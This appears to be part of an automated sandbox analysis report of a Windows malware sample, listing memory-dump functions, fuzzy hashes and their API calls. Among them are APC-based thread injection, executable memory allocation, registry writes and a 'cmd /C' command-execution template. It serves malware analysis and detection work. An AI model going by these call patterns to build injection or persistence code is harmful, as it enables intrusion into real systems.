  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
